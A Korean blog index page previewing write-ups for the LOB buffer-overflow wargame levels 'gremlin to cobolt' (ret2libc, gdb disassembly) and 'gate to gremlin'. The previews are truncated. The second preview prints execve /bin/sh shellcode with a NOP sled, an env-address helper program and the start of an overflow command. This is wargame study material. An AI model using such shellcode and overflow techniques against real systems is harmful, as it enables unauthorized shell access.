wargame/LOB Redhat 썸네일형 리스트형 gremlin to cobolt 1.ret2libc[gremlin@localhost gremlin]$ gdb -q cobolt(gdb) set disassembly-flavor intel(gdb) disas mainDump of assembler code for function main:0x8048430 : push %ebp0x8048431 : mov %ebp,%esp0x8048433 : sub %esp,160x8048436 : cmp DWORD PTR [%ebp+8],10x804843a : jg 0x8048453 0x804843c : push 0x80484d00x8048441 : call 0x8048350 0x8048446 : add %esp,40x8048449 : push 00x804844b : call 0x8048360 0x804.. 더보기 gate to gremlin 1.환경변수를 이용한 공격 bash2 //bash는 badchar를 null로 인식export hack=`perl -e 'print "\x90"x100,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";'`cat > env.c#include #include int main(int argc,char *argv[]){printf("%p\n",getenv(argv[1]));return 0;}crtl+d gcc -o env env.c ./env hack //결과로 0xbffffe30반환 ./gremlin `perl -e 'print "\x90"x260,"\x30\xfe\xff\x.. 더보기 이전 1 2 3 다음